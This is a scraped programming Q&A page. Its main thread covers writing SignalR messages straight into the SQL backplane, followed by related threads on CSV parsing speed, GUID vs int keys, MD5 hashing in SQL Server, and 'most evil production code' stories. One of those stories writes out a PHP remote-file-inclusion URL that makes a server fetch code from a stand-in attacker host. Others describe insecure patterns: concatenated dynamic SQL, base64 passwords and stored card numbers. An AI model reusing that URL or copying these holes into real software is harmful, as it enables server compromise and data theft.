Is it possible to add SignalR messages directly to the SQL Backplane? - sql

I'd like to know if I can add SignalR messages directly to the SignalR SQL Backplane (from SQL) so I don't have to use a SignalR client to do so.
My situation is that I have an activated stored procedure for a SQL Service Broker queue, and when it fires, I'd like to post a message to SignalR clients. Currently, I have to receive the message from SQL Service Broker in a seperate process and then immediately re-send the message with a SignalR hub.
I'd like my activated stored procedure to basically move the message directly onto the SignalR SQL Backplane.

Yes and no. I set up a small experiment on my localhost to determine if possible - and it is, if formatted properly.
Now, a word on the [SignalR] schema. It generates three tables:
[SignalR].[Messages_0]
--this holds a list of all messages with the columns of
--[PayloadId], [Payload], and [InsertedOn]
[SignalR].[Messages_0_Id]
--this holds one record of one field - the last Id value in the [Messages_0] table
[SignalR].[Scehma]
--No idea what this is for; it's a 1 column (SchemaVersion) 1 record (value of 1) table
Right, so, I duplicated the last column except I incremented the PayloadId (for the new record and in [Messages_0_Id] and put in GETDATE() as the value for InsertedOn. Immediately after adding the record, a new message came into the connected client. Note that PayloadId is not an identity column, so you must manually increment it, and you must copy that incremented value into the only record in [Messages_0_Id], otherwise your signalr clients will be unable to connect due to Signalr SQL errors.
Now, the trick is populating the [Payload] column properly. A quick look at the table shows that it's probably binary serialized. I'm no expert at SQL, but I'm pretty sure doing a binary serialization is up there in difficulty. If I'm right, this is the source code for the binary serialization, located inside Microsoft.AspNet.SignalR.Messaging.ScaleoutMessage:
public byte[] ToBytes()
{
using (MemoryStream memoryStream = new MemoryStream())
{
BinaryWriter binaryWriter = new BinaryWriter((Stream) memoryStream);
binaryWriter.Write(this.Messages.Count);
for (int index = 0; index < this.Messages.Count; ++index)
this.Messages[index].WriteTo((Stream) memoryStream);
binaryWriter.Write(this.ServerCreationTime.Ticks);
return memoryStream.ToArray();
}
}
With WriteTo:
public void WriteTo(Stream stream)
{
BinaryWriter binaryWriter = new BinaryWriter(stream);
string source = this.Source;
binaryWriter.Write(source);
string key = this.Key;
binaryWriter.Write(key);
int count1 = this.Value.Count;
binaryWriter.Write(count1);
ArraySegment<byte> arraySegment = this.Value;
byte[] array = arraySegment.Array;
arraySegment = this.Value;
int offset = arraySegment.Offset;
arraySegment = this.Value;
int count2 = arraySegment.Count;
binaryWriter.Write(array, offset, count2);
string str1 = this.CommandId ?? string.Empty;
binaryWriter.Write(str1);
int num1 = this.WaitForAck ? 1 : 0;
binaryWriter.Write(num1 != 0);
int num2 = this.IsAck ? 1 : 0;
binaryWriter.Write(num2 != 0);
string str2 = this.Filter ?? string.Empty;
binaryWriter.Write(str2);
}
So, re-implementing that in a stored procedure with pure SQL will be near impossible. If you need to do it on the SQL Server, I suggest using SQL CLR functions. One thing to mention, though - It's easy enough to use a class library, but if you want to reduce hassle over the long term, I'd suggest creating a SQL Server project in Visual Studio. This will allow you to automagically deploy CLR functions with much more ease than manually re-copying the latest class library to the SQL Server. This page talks more about how to do that.

I was inspired by this post and wrote up a version in an SQL stored proc. Works really slick, and wasn't hard.
I hadn't done much work with varbinary before - but SQL server makes it pretty easy to work with, and you can just add the sections together. The format given by James Haug above is accurate. Most of the strings are just "length as byte then the string content" (with the string content just being convert(varbinary,string)). The exception string is the payload, which instead is "length as int32 then string content". Numbers are written out "least significant byte first". I'm not sure whether you can do a conversion like this natively - I found it easy enough to write this myself as a recursive function (something like numToBinary(val,bytesRemaining)... returns varbinary).
If you take this route, I'd still write a parser first (in .NET or another non-SQL language) and test it on some packets generated by SignalR itself. That gives you a better place to work out the kinks in your SQL - and learn the right formatting of the payload package and what not.

Related

Reading a CSV file with 50M lines, how to improve performance

I have a data file in CSV (Comma-Separated-Value) format that has about 50 million lines in it.
Each line is read into a string, parsed, and then used to fill in the fields of an object of type FOO. The object then gets added to a List(of FOO) that ultimately has 50 million items.
That all works, and fits in memory (at least on an x64 machine), but its SLOW. It takes like 5 minutes every time load and parse the file into the list. I would like to make it faster. How can I make it faster?
The important parts of the code are shown below.
Public Sub LoadCsvFile(ByVal FilePath As String)
Dim s As IO.StreamReader = My.Computer.FileSystem.OpenTextFileReader(FilePath)
'Find header line
Dim L As String
While Not s.EndOfStream
L = s.ReadLine()
If L = "" Then Continue While 'discard blank line
Exit While
End While
'Parse data lines
While Not s.EndOfStream
L = s.ReadLine()
If L = "" Then Continue While 'discard blank line
Dim T As FOO = FOO.FromCSV(L)
Add(T)
End While
s.Close()
End Sub
Public Class FOO
Public time As Date
Public ID As UInt64
Public A As Double
Public B As Double
Public C As Double
Public Shared Function FromCSV(ByVal X As String) As FOO
Dim T As New FOO
Dim tokens As String() = X.Split(",")
If Not DateTime.TryParse(tokens(0), T.time) Then
Throw New Exception("Could not convert CSV to FOO: Invalid ISO 8601 timestamp")
End If
If Not UInt64.TryParse(tokens(1), T.ID) Then
Throw New Exception("Could not convert CSV to FOO: Invalid ID")
End If
If Not Double.TryParse(tokens(2), T.A) Then
Throw New Exception("Could not convert CSV to FOO: Invalid Format for A")
End If
If Not Double.TryParse(tokens(3), T.B) Then
Throw New Exception("Could not convert CSV to FOO: Invalid Format for B")
End If
If Not Double.TryParse(tokens(4), T.C) Then
Throw New Exception("Could not convert CSV to FOO: Invalid Format for C")
End If
Return T
End Function
End Class
I did some benchmarking and here are the results.
The complete algorithm above took 314 seconds to load the whole file and put the objects into the list.
With the body of FromCSV() reduced to just returning a new object of type FOO with default field values, the whole process took 84 seconds. Therefore it appears that processing the line of text into the object fields is taking 230 seconds (73% of the total time).
Doing everything but parsing the ISO 8601 date string takes 175 seconds. Therefore it appears that processing the date string takes 139 seconds, which is 60% of the text processing time, just for that one field.
Just reading the lines in the file without any processing or object creating takes 41 seconds.
Using StreamReader.ReadBlock to read the whole file in chunks of about 1KB takes 24s, but its a minor improvement in the grand scheme of things and probably not worth the added complexity. In order to use TryParse I would now need to manually create the temporary strings rather than using String.Split().
At this point the only path I see is to just display status to the user every few seconds so they don't wonder if the program is frozen or something.
UPDATE
I created two new functions. One can save the dataset from memory into a binary file using System.IO.BinaryWriter. The other function can load that binary file back into memory using System.IO.BinaryReader. The binary versions were considerably faster than CSV versions, and the binary files take up much less space.
Here are the benchmark results (same dataset for all tests):
LOAD CSV: 340s
SAVE CSV: 312s
SAVE BIN: 29s
LOAD BIN: 41s
CSV FILE SIZE: 3.86GB
BIN FILE SIZE: 1.63GB
I have a lot of experience with CSV, and the bad news is that you aren't going to be able to make this a whole lot faster. CSV libraries aren't going to be of much assistance here. The difficult problem with CSV, that libraries attempt to handle, is dealing with fields that have embedded commas, or newlines, which require quoting and escaping. Your dataset doesn't have this issue, since none of the columns are strings.
As you have discovered, the bulk of the time is spent in the parse methods. Andrew Morton had a good suggestion, using TryParseExact for DateTime values can be a quite a bit faster than TryParse. My own CSV library, Sylvan.Data.Csv (which is the fastest available for .NET), uses an optimization where it parses primitive values directly out of the stream read buffer without converting to string first (only when running on .NET core), that can also speed things up a bit. However, I wouldn't expect it to be possible to cut the processing time in half while sticking with CSV.
Here is an example of using my library, Sylvan.Data.Csv to process the CSV in C#.
static List<Foo> Read(string file)
{
// estimate of the average row length based on Andrew Morton's 4GB/50m
const int AverageRowLength = 80;
var textReader = File.OpenText(file);
// specifying the DateFormat will cause TryParseExact to be used.
var csvOpts = new CsvDataReaderOptions { DateFormat = "yyyy-MM-ddTHH:mm:ss" };
var csvReader = CsvDataReader.Create(textReader, csvOpts);
// estimate number of rows to avoid growing the list.
var estimatedRows = (int)(textReader.BaseStream.Length / AverageRowLength);
var data = new List<Foo>(estimatedRows);
while (csvReader.Read())
{
if (csvReader.RowFieldCount < 5) continue;
var item = new Foo()
{
time = csvReader.GetDateTime(0),
ID = csvReader.GetInt64(1),
A = csvReader.GetDouble(2),
B = csvReader.GetDouble(3),
C = csvReader.GetDouble(4)
};
data.Add(item);
}
return data;
}
I'd expect this to be somewhat faster than your current implementation, so long as you are running on .NET core. Running on .NET framework the difference, if any, wouldn't be a significant. However, I don't expect this to be acceptably fast for your users, it will still likely take tens of seconds, or minutes to read the whole file.
Given that, my advice would be to abandon CSV altogether, which means you can abandon parsing which is what is slowing things down. Instead, read and write the data in binary form. Your data records have a nice property, in that they are fixed width: each record contains 5 fields that are 8 bytes (64bit) wide, so each record requires exactly 40 bytes in binary form. 50m x 40 = 2GB. So, assuming Andrew Morton's estimate of 4GB for the CSV is correct, moving to binary will halve the storage needs. Immediately, that means there is half as much disk IO needed to read the same data. But beyond that, you won't need to parse anything, the binary representation of the value will essentially be copied directly to memory.
Here are some examples of how to do this in C# (don't know VB very well, sorry).
static List<Foo> Read(string file)
{
var stream = File.OpenRead(file);
// the exact number of records can be determined by looking at the length of the file.
var recordCount = stream.Length / 40;
var data = new List<Foo>(recordCount);
var br = new BinaryReader(stream);
for (int i = 0; i < recordCount; i++)
{
var ticks = br.ReadInt64();
var id = br.ReadInt64();
var a = br.ReadDouble();
var b = br.ReadDouble();
var c = br.ReadDouble();
var f = new Foo()
{
time = new DateTime(ticks),
ID = id,
A = a,
B = b,
C = c,
};
data.Add(f);
}
return data;
}
static void Write(List<Foo> data, string file)
{
var stream = File.Create(file);
var bw = new BinaryWriter(stream);
foreach(var item in data)
{
bw.Write(item.time.Ticks);
bw.Write(item.ID);
bw.Write(item.A);
bw.Write(item.B);
bw.Write(item.C);
}
}
This should almost certainly be an order of magnitude faster than a CSV-based solution. The question then becomes: is there some reason that you must use CSV? If the source of the data is out of your control, and you must use CSV, I would then ask: will the data file change every time, or will it only be appended to with new data? If it is appended to, I would investigate a solution where each time the app starts convert only the new section of appended CSV data and add it to a binary file that you will then load everything from. Then you only have to pay the cost of processing the new CSV data each time, and will load everything quickly from the binary form.
This could be made even faster by creating fixed layout struct (Foo), allocating an array of them, and using span-based trickery to read the array data directly from the FileStream. This can be done because all of your data elements are "blittable". This would be the absolute fastest way to load this data into your program. Start with the BinaryReader/Writer and if you find that still isn't fast enough, then investigate this.
If you find this solution to work, I'd love to hear the results.

how common is it to use both a guid and an int as unique identifiers for a table?

I think a Guid is generally the preferred unique table row identifier from a dba perspective. But I'm working on a project where the developers and managers appear to want a way to reference things by an int value. I can understand their perspective b/c they want a simple and easy way to reference different entities.
I was thinking about using a pattern for my tables where each table would have an int Id column representing the PK column but then it would also include a Guid column as a globally unique identifier. How common is it to use this type of pattern?
In the vast majority of cases you'll want to either use an INT or BIGINT for you primekey/foreign key. For the most part you are looking to make sure that table can be joined to and have a way to easily select a single unique row. In theory using GUIDs all over the place gets you there too, if you were a robot and could quickly ask a colleague, "Hey can you check out ROW_ID FD229C39-2074-4B04-8A50-456402705C02" vs "Hey can you check out ROW_ID 523". But we are human. I don't think there is a really good reason to include another column that is simply a GUID in addition to your PK (which should be an INT or BIGINT)
It can also be nice to have your PK in an order, that seems to come in handy. GUIDs won't be in a order. However, a case for using a GUID would be if you have to expose this value to a customer. You may not want them to know they are customer #6. But being customer #B8D44820-DF75-44C9-8527-F6AC7D1D259B isn't too great if they have to call in and identify themselves, but might be fine for writing code against (say a webservice or some kind of API). SQL is a lot of art with the science!
In addition do you really need a global unique id for a row? Probably not. If you are designing a system that could use up more than what INT can handle (say total number of tweets in all time) then use BIGINT. If you can use up all the BIGINTs, wow. I'd be interested in hearing how and would like to subscribe to your newsletter.
A question I ask myself when writing stuff, "If I'm wrong how hard will it be to do the other way?". If you really need a GUID later, add it. If you put it in now and just 1 person uses it you can never take it out and it will have to be maintained... job security? nah, don't think that way :) Don't over engineer it.
I would not say GUID is generally preferred from a DBA perspective. It is larger (16 bytes rather than 4 for int or 8 for bigint) and the random variety introduces fragmentation and causes much more IO with large tables due to lower page life expectancy. This is especially a problem with spinning media and limited RAM.
When a GUID is actually needed, some of these issues can be avoided using a sequential version for the GUID value rather than introducing another surrogate key. The value can be assigned in by SQL Server with a NEWSEQUENTIALID() default constraint on a column or generated in application code with the bytes ordered properly for SQL Server. Below is a Windows C# example of the latter technique.
using System;
using System.Runtime.InteropServices;
public class Example
{
[DllImport("rpcrt4.dll", CharSet = CharSet.Auto)]
public static extern int UuidCreateSequential(ref Guid guid);
/// sequential guid for SQL Server
public static Guid NewSequentialGuid()
{
const int S_OK = 0;
const int RPC_S_UUID_LOCAL_ONLY = 1824;
Guid oldGuid = Guid.Empty;
int result = UuidCreateSequential(ref oldGuid);
if (result != S_OK && result != RPC_S_UUID_LOCAL_ONLY)
{
throw new ExternalException("UuidCreateSequential call failed", result);
}
byte[] oldGuidBytes = oldGuid.ToByteArray();
byte[] newGuidBytes = new byte[16];
oldGuidBytes.CopyTo(newGuidBytes, 0);
// swap low timestamp bytes (0-3)
newGuidBytes[0] = oldGuidBytes[3];
newGuidBytes[1] = oldGuidBytes[2];
newGuidBytes[2] = oldGuidBytes[1];
newGuidBytes[3] = oldGuidBytes[0];
// swap middle timestamp bytes (4-5)
newGuidBytes[4] = oldGuidBytes[5];
newGuidBytes[5] = oldGuidBytes[4];
// swap high timestamp bytes (6-7)
newGuidBytes[6] = oldGuidBytes[7];
newGuidBytes[7] = oldGuidBytes[6];
//remaining 8 bytes are unchanged (8-15)
return new Guid(newGuidBytes);
}
}

Using MD5 in SQL Server 2005 to do a checksum file on a varbinary

Im trying to do a MD5 check for a file uploaded to a varbinary field in MSSQL 2005.
I uploaded the file and using
SELECT DATALENGTH(thefile) FROM table
I get the same number of bytes that the file has.
But using MD5 calculator (from bullzip) i get this MD5:
20cb960d7b191d0c8bc390d135f63624
and using SQL I get this MD5:
44c29edb103a2872f519ad0c9a0fdaaa
Why they are different if the field has the same lenght and so i assume the same bytes?
My SQL Code to do that was:
DECLARE #HashThis varbinary;
DECLARE #md5text varchar(250);
SELECT #HashThis = thefile FROM CFile WHERE id=1;
SET #md5text = SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES('MD5',#HashThis)),3,32)
PRINT #md5text;
Maybe the data type conversion?
Any tip will be helpful.
Thanks a lot :)
Two options
VARBINARY type without size modifier utilizes VARBINARY(1), so you are hashing the very 1st byte of file, SELECT DATALENGTH(#HashThis) after assignment will bring to you 1
If you use varbinary(MAX) instead - then keep in mind, that HASHBYTES hashes only first 8000 bytes of input
If you want to perform hashing more than 8000 bytes - write your own CLR hash function, for example the file is from my sql server project, it brings the same results as other hash functions outside of sql server:
using System;
using System.Data.SqlTypes;
using System.IO;
namespace ClrHelpers
{
public partial class UserDefinedFunctions {
[Microsoft.SqlServer.Server.SqlFunction]
public static Guid HashMD5(SqlBytes data) {
System.Security.Cryptography.MD5CryptoServiceProvider md5 = new System.Security.Cryptography.MD5CryptoServiceProvider();
md5.Initialize();
int len = 0;
byte[] b = new byte[8192];
Stream s = data.Stream;
do {
len = s.Read(b, 0, 8192);
md5.TransformBlock(b, 0, len, b, 0);
} while(len > 0);
md5.TransformFinalBlock(b, 0, 0);
Guid g = new Guid(md5.Hash);
return g;
}
};
}
It can be that MD5 Calculator is making the MD5 Hash of file content + other properties (ex: author, last process date, etc.). You may try to do alter these properties and make another hash to see if the result is equal (between before and after using only MD5 Calculator).
Another possibility is about what are you really saving in SQL Server..
So, it's quite clear, MD5 Calculator and SQL Server are hashing different things. What? I give a congratz to who answers it :)

What is the most EVIL code you have ever seen in a production enterprise environment? [closed]

As it currently stands, this question is not a good fit for our Q&A format. We expect answers to be supported by facts, references, or expertise, but this question will likely solicit debate, arguments, polling, or extended discussion. If you feel that this question can be improved and possibly reopened, visit the help center for guidance.
Closed 11 years ago.
Locked. This question and its answers are locked because the question is off-topic but has historical significance. It is not currently accepting new answers or interactions.
What is the most evil or dangerous code fragment you have ever seen in a production environment at a company? I've never encountered production code that I would consider to be deliberately malicious and evil, so I'm quite curious to see what others have found.
The most dangerous code I have ever seen was a stored procedure two linked-servers away from our core production database server. The stored procedure accepted any NVARCHAR(8000) parameter and executed the parameter on the target production server via an double-jump sp_executeSQL command. That is to say, the sp_executeSQL command executed another sp_executeSQL command in order to jump two linked servers. Oh, and the linked server account had sysadmin rights on the target production server.
Warning: Long scary post ahead
I've written about one application I've worked on before here and here. To put it simply, my company inherited 130,000 lines of garbage from India. The application was written in C#; it was a teller app, the same kind of software tellers use behind the counter whenever you go to the bank. The app crashed 40-50 times a day, and it simply couldn't be refactored into working code. My company had to re-write the entire app over the course of 12 months.
Why is this application evil? Because the sight of the source code was enough to drive a sane man mad and a mad man sane. The twisted logic used to write this application could have only been inspired by a Lovecraftian nightmare. Unique features of this application included:
Out of 130,000 lines of code, the entire application contained 5 classes (excluding form files). All of these were public static classes. One class was called Globals.cs, which contained 1000s and 1000s and 1000s of public static variables used to hold the entire state of the application. Those five classes contained 20,000 lines of code total, with the remaining code embedded in the forms.
You have to wonder, how did the programmers manage to write such a big application without any classes? What did they use to represent their data objects? It turns out the programmers managed to re-invent half of the concepts we all learned about OOP simply by combining ArrayLists, HashTables, and DataTables. We saw a lot of this:
ArrayLists of hashtables
Hashtables with string keys and DataRow values
ArrayLists of DataTables
DataRows containing ArrayLists which contained HashTables
ArrayLists of DataRows
ArrayLists of ArrayLists
HashTables with string keys and HashTable values
ArrayLists of ArrayLists of HashTables
Every other combination of ArrayLists, HashTables, DataTables you can think of.
Keep in mind, none of the data structures above are strongly typed, so you have to cast whatever mystery object you get out of the list to the correct type. It's amazing what kind of complex, Rube Goldberg-like data structures you can create using just ArrayLists, HashTables, and DataTables.
To share an example of how to use the object model detailed above, consider Accounts: the original programmer created a seperate HashTable for each concievable property of an account: a HashTable called hstAcctExists, hstAcctNeedsOverride, hstAcctFirstName. The keys for all of those hashtables was a “|” separated string. Conceivable keys included “123456|DDA”, “24100|SVG”, “100|LNS”, etc.
Since the state of the entire application was readily accessible from global variables, the programmers found it unnecessary to pass parameters to methods. I'd say 90% of methods took 0 parameters. Of the few which did, all parameters were passed as strings for convenience, regardless of what the string represented.
Side-effect free functions did not exist. Every method modified 1 or more variables in the Globals class. Not all side-effects made sense; for example, one of the form validation methods had a mysterious side effect of calculating over and short payments on loans for whatever account was stored Globals.lngAcctNum.
Although there were lots of forms, there was one form to rule them all: frmMain.cs, which contained a whopping 20,000 lines of code. What did frmMain do? Everything. It looked up accounts, printed receipts, dispensed cash, it did everything.
Sometimes other forms needed to call methods on frmMain. Rather than factor that code out of the form into a seperate class, why not just invoke the code directly:
((frmMain)this.MDIParent).UpdateStatusBar(hstValues);
To look up accounts, the programmers did something like this:
bool blnAccountExists =
new frmAccounts().GetAccountInfo().blnAccountExists
As bad as it already is creating an invisible form to perform business logic, how do you think the form knew which account to look up? That’s easy: the form could access Globals.lngAcctNum and Globals.strAcctType. (Who doesn't love Hungarian notation?)
Code-reuse was a synonym for ctrl-c, ctrl-v. I found 200-line methods copy/pasted across 20 forms.
The application had a bizarre threading model, something I like to call the thread-and-timer model: each form that spawned a thread had a timer on it. Each thread that was spawned kicked off a timer which had a 200 ms delay; once the timer started, it would check to see if the thread had set some magic boolean, then it would abort the thread. The resulting ThreadAbortException was swallowed.
You'd think you'd only see this pattern once, but I found it in at least 10 different places.
Speaking of threads, the keyword "lock" never appeared in the application. Threads manipulated global state freely without taking a lock.
Every method in the application contained a try/catch block. Every exception was logged and swallowed.
Who needs to switch on enums when switching on strings is just as easy!
Some genius figured out that you can hook multiple form controls up to the same event handler. How did the programmer handle this?
private void OperationButton_Click(object sender, EventArgs e)
{
Button btn = (Button)sender;
if (blnModeIsAddMc)
{
AddMcOperationKeyPress(btn);
}
else
{
string strToBeAppendedLater = string.Empty;
if (btn.Name != "btnBS")
{
UpdateText();
}
if (txtEdit.Text.Trim() != "Error")
{
SaveFormState();
}
switch (btn.Name)
{
case "btnC":
ResetValues();
break;
case "btnCE":
txtEdit.Text = "0";
break;
case "btnBS":
if (!blnStartedNew)
{
string EditText = txtEdit.Text.Substring(0, txtEdit.Text.Length - 1);
DisplayValue((EditText == string.Empty) ? "0" : EditText);
}
break;
case "btnPercent":
blnAfterOp = true;
if (GetValueDecimal(txtEdit.Text, out decCurrValue))
{
AddToTape(GetValueString(decCurrValue), (string)btn.Text, true, false);
decCurrValue = decResultValue * decCurrValue / intFormatFactor;
DisplayValue(GetValueString(decCurrValue));
AddToTape(GetValueString(decCurrValue), string.Empty, true, false);
strToBeAppendedLater = GetValueString(decResultValue).PadLeft(20)
+ strOpPressed.PadRight(3);
if (arrLstTapeHist.Count == 0)
{
arrLstTapeHist.Add(strToBeAppendedLater);
}
blnEqualOccurred = false;
blnStartedNew = true;
}
break;
case "btnAdd":
case "btnSubtract":
case "btnMultiply":
case "btnDivide":
blnAfterOp = true;
if (txtEdit.Text.Trim() == "Error")
{
btnC.PerformClick();
return;
}
if (blnNumPressed || blnEqualOccurred)
{
if (GetValueDecimal(txtEdit.Text, out decCurrValue))
{
if (Operation())
{
AddToTape(GetValueString(decCurrValue), (string)btn.Text, true, true);
DisplayValue(GetValueString(decResultValue));
}
else
{
AddToTape(GetValueString(decCurrValue), (string)btn.Text, true, true);
DisplayValue("Error");
}
strOpPressed = btn.Text;
blnEqualOccurred = false;
blnNumPressed = false;
}
}
else
{
strOpPressed = btn.Text;
AddToTape(GetValueString(0), (string)btn.Text, false, false);
}
if (txtEdit.Text.Trim() == "Error")
{
AddToTape("Error", string.Empty, true, true);
btnC.PerformClick();
txtEdit.Text = "Error";
}
break;
case "btnEqual":
blnAfterOp = false;
if (strOpPressed != string.Empty || strPrevOp != string.Empty)
{
if (GetValueDecimal(txtEdit.Text, out decCurrValue))
{
if (OperationEqual())
{
DisplayValue(GetValueString(decResultValue));
}
else
{
DisplayValue("Error");
}
if (!blnEqualOccurred)
{
strPrevOp = strOpPressed;
decHistValue = decCurrValue;
blnNumPressed = false;
blnEqualOccurred = true;
}
strOpPressed = string.Empty;
}
}
break;
case "btnSign":
GetValueDecimal(txtEdit.Text, out decCurrValue);
DisplayValue(GetValueString(-1 * decCurrValue));
break;
}
}
}
The same genius also discovered the glorious ternary operator. Here are some code samples:
frmTranHist.cs [line 812]:
strDrCr = chkCredits.Checked && chkDebits.Checked ? string.Empty
: chkDebits.Checked ? "D"
: chkCredits.Checked ? "C"
: "N";
frmTellTransHist.cs [line 961]:
if (strDefaultVals == strNowVals && (dsTranHist == null ? true : dsTranHist.Tables.Count == 0 ? true : dsTranHist.Tables[0].Rows.Count == 0 ? true : false))
frmMain.TellCash.cs [line 727]:
if (Validations(parPostMode == "ADD" ? true : false))
Here's a code snippet which demonstrates the typical misuse of the StringBuilder. Note how the programmer concats a string in a loop, then appends the resulting string to the StringBuilder:
private string CreateGridString()
{
string strTemp = string.Empty;
StringBuilder strBuild = new StringBuilder();
foreach (DataGridViewRow dgrRow in dgvAcctHist.Rows)
{
strTemp = ((DataRowView)dgrRow.DataBoundItem)["Hst_chknum"].ToString().PadLeft(8, ' ');
strTemp += " ";
strTemp += Convert.ToDateTime(((DataRowView)dgrRow.DataBoundItem)["Hst_trandt"]).ToString("MM/dd/yyyy");
strTemp += " ";
strTemp += ((DataRowView)dgrRow.DataBoundItem)["Hst_DrAmount"].ToString().PadLeft(15, ' ');
strTemp += " ";
strTemp += ((DataRowView)dgrRow.DataBoundItem)["Hst_CrAmount"].ToString().PadLeft(15, ' ');
strTemp += " ";
strTemp += ((DataRowView)dgrRow.DataBoundItem)["Hst_trancd"].ToString().PadLeft(4, ' ');
strTemp += " ";
strTemp += GetDescriptionString(((DataRowView)dgrRow.DataBoundItem)["Hst_desc"].ToString(), 30, 62);
strBuild.AppendLine(strTemp);
}
strCreateGridString = strBuild.ToString();
return strCreateGridString;//strBuild.ToString();
}
No primary keys, indexes, or foreign key constraints existed on tables, nearly all fields were of type varchar(50), and 100% of fields were nullable. Interestingly, bit fields were not used to store boolean data; instead a char(1) field was used, and the characters 'Y' and 'N' used to represent true and false respectively.
Speaking of the database, here's a representative example of a stored procedure:
ALTER PROCEDURE [dbo].[Get_TransHist]
(
#TellerID int = null,
#CashDrawer int = null,
#AcctNum bigint = null,
#StartDate datetime = null,
#EndDate datetime = null,
#StartTranAmt decimal(18,2) = null,
#EndTranAmt decimal(18,2) = null,
#TranCode int = null,
#TranType int = null
)
AS
declare #WhereCond Varchar(1000)
declare #strQuery Varchar(2000)
Set #WhereCond = ' '
Set #strQuery = ' '
If not #TellerID is null
Set #WhereCond = #WhereCond + ' AND TT.TellerID = ' + Cast(#TellerID as varchar)
If not #CashDrawer is null
Set #WhereCond = #WhereCond + ' AND TT.CDId = ' + Cast(#CashDrawer as varchar)
If not #AcctNum is null
Set #WhereCond = #WhereCond + ' AND TT.AcctNbr = ' + Cast(#AcctNum as varchar)
If not #StartDate is null
Set #WhereCond = #WhereCond + ' AND Convert(varchar,TT.PostDate,121) >= ''' + Convert(varchar,#StartDate,121) + ''''
If not #EndDate is null
Set #WhereCond = #WhereCond + ' AND Convert(varchar,TT.PostDate,121) <= ''' + Convert(varchar,#EndDate,121) + ''''
If not #TranCode is null
Set #WhereCond = #WhereCond + ' AND TT.TranCode = ' + Cast(#TranCode as varchar)
If not #EndTranAmt is null
Set #WhereCond = #WhereCond + ' AND TT.TranAmt <= ' + Cast(#EndTranAmt as varchar)
If not #StartTranAmt is null
Set #WhereCond = #WhereCond + ' AND TT.TranAmt >= ' + Cast(#StartTranAmt as varchar)
If not (#TranType is null or #TranType = -1)
Set #WhereCond = #WhereCond + ' AND TT.DocType = ' + Cast(#TranType as varchar)
--Get the Teller Transaction Records according to the filters
Set #strQuery = 'SELECT
TT.TranAmt as [Transaction Amount],
TT.TranCode as [Transaction Code],
RTrim(LTrim(TT.TranDesc)) as [Transaction Description],
TT.AcctNbr as [Account Number],
TT.TranID as [Transaction Number],
Convert(varchar,TT.ActivityDateTime,101) as [Activity Date],
Convert(varchar,TT.EffDate,101) as [Effective Date],
Convert(varchar,TT.PostDate,101) as [Post Date],
Convert(varchar,TT.ActivityDateTime,108) as [Time],
TT.BatchID,
TT.ItemID,
isnull(TT.DocumentID, 0) as DocumentID,
TT.TellerName,
TT.CDId,
TT.ChkNbr,
RTrim(LTrim(DT.DocTypeDescr)) as DocTypeDescr,
(CASE WHEN TT.TranMode = ''F'' THEN ''Offline'' ELSE ''Online'' END) TranMode,
DispensedYN
FROM TellerTrans TT WITH (NOLOCK)
LEFT OUTER JOIN DocumentTypes DT WITH (NOLOCK) on DocType = DocumentType
WHERE IsNull(TT.DeletedYN, 0) = 0 ' + #WhereCond + ' Order By BatchId, TranID, ItemID'
Exec (#strQuery)
With all that said, the single biggest problem with this 130,000 line application this: no unit tests.
Yes, I have sent this story to TheDailyWTF, and then I quit my job.
In a system which took credit card payments we used to store the full credit card number along with name, expiration date etc.
Turns out this is illegal, which is ironic given the we were writing the program for the Justice Department at the time.
I've seen a password encryption function like this
function EncryptPassword($password)
{
return base64_encode($password);
}
This was the error handling routine in a piece of commercial code:
/* FIXME! */
while (TRUE)
;
I was supposed to find out why "the app keeps locking up".
Combination of all of the following Php 'Features' at once.
Register Globals
Variable Variables
Inclusion of remote files and code via include("http:// ... ");
Really Horrific Array/Variable names ( Literal example ):
foreach( $variablesarry as $variablearry ){
include( $$variablearry );
}
( I literally spent an hour trying to work out how that worked before I realised they wern't the same variable )
Include 50 files, which each include 50 files, and stuff is performed linearly/procedurally across all 50 files in conditional and unpredictable ways.
For those who don't know variable variables:
$x = "hello";
$$x = "world";
print $hello # "world" ;
Now consider $x contains a value from your URL ( register globals magic ), so nowhere in your code is it obvious what variable your working with becuase its all determined by the url.
Now consider what happens when the contents of that variable can be a url specified by the websites user.
Yes, this may not make sense to you, but it creates a variable named that url, ie:
$http://google.com,
except it cant be directly accessed, you have to use it via the double $ technique above.
Additionally, when its possible for a user to specify a variable on the URL which indicates which file to include, there are nasty tricks like
http://foo.bar.com/baz.php?include=http://evil.org/evilcode.php
and if that variable turns up in include($include)
and 'evilcode.php' prints its code plaintext, and Php is inappropriately secured, php will just trundle off, download evilcode.php, and execute it as the user of the web-server.
The web-sever will give it all its permissions etc, permiting shell calls, downloading arbitrary binaries and running them, etc etc, until eventually you wonder why you have a box running out of disk space, and one dir has 8GB of pirated movies with italian dubbing, being shared on IRC via a bot.
I'm just thankful I discovered that atrocity before the script running the attack decided to do something really dangerous like harvest extremely confidential information from the more or less unsecured database :|
( I could entertain the dailywtf every day for 6 months with that codebase, I kid you not. Its just a shame I discovered the dailywtf after I escaped that code )
In the main project header file, from an old-hand COBOL programmer, who was inexplicably writing a compiler in C:
int i, j, k;
"So you won't get a compiler error if you forget to declare your loop variables."
The Windows installer.
This article How to Write Unmaintainable Code covers some of the most brilliant techniques known to man. Some of my favorite ones are:
New Uses For Names For Baby
Buy a copy of a baby naming book and you'll never be at a loss for variable names. Fred is a wonderful name, and easy to type. If you're looking for easy-to-type variable names, try adsf or aoeu if you type with a DSK keyboard.
Creative Miss-spelling
If you must use descriptive variable and function names, misspell them. By misspelling in some function and variable names, and spelling it correctly in others (such as SetPintleOpening SetPintalClosing) we effectively negate the use of grep or IDE search techniques. It works amazingly well. Add an international flavor by spelling tory or tori in different theatres/theaters.
Be Abstract
In naming functions and variables, make heavy use of abstract words like it, everything, data, handle, stuff, do, routine, perform and the digits e.g. routineX48, PerformDataFunction, DoIt, HandleStuff and do_args_method.
CapiTaliSaTion
Randomly capitalize the first letter of a syllable in the middle of a word. For example ComputeRasterHistoGram().
Lower Case l Looks a Lot Like the Digit 1
Use lower case l to indicate long constants. e.g. 10l is more likely to be mistaken for 101 that 10L is. Ban any fonts that clearly disambiguate uvw wW gq9 2z 5s il17|!j oO08 `'" ;,. m nn rn {[()]}. Be creative.
Recycle Your Variables
Wherever scope rules permit, reuse existing unrelated variable names. Similarly, use the same temporary variable for two unrelated purposes (purporting to save stack slots). For a fiendish variant, morph the variable, for example, assign a value to a variable at the top of a very long method, and then somewhere in the middle, change the meaning of the variable in a subtle way, such as converting it from a 0-based coordinate to a 1-based coordinate. Be certain not to document this change in meaning.
Cd wrttn wtht vwls s mch trsr
